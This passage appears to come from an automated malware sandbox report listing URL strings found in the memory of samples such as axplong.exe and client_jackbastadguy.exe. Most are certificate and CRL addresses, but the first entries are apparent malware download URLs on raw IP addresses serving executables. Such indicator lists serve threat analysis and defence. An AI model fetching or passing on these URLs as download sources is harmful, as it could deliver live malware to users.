                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exefG
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/test/am209.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exe3d
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique1/random.exec3ddD
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2786528925.000002103DF65000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764899734.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771896147.000002103D5E5000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789428505.000002103D64B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785200465.000002103DA3D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788433493.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2786429300.000002103D644000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802094004.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785783055.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF6B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765366877.000002103D5E4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772439999.000002103D641000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782068585.000002103D644000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2792961287.000002103DA3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805687091.000002103E490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue23606)
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772137420.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789238682.000002103DA04000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770927694.000002103D89C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774502407.000002103D89F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775178059.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780034567.000002103DA02000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775297088.000002103D8AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2777953270.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775297088.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782934606.000002103D8FB000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770927694.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779753706.000002103D8F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782498003.000002103D8F7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783592173.000002103D8FF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2736144327.000002103D937000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2736144327.000002103D8F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777680443.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805065822.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF6D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2780134814.000002103B53E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800191162.000002103B547000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783218553.000002103B544000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777372598.000002103E120000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781448738.000002103E124000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772137420.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789238682.000002103DA04000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775178059.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777372598.000002103E120000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780034567.000002103DA02000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781448738.000002103E124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765739149.000002103D958000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781548241.000002103D95A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776435894.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773693170.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785963640.000002103D95B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772137420.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789238682.000002103DA04000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775178059.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780034567.000002103DA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlZid
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777680443.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805065822.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlK
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2799879587.000002103B4DA000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2799879587.000002103B4DA000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl38
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2799879587.000002103B4DA000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2799879587.000002103B4DA000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlived
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777372598.000002103E120000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781448738.000002103E124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
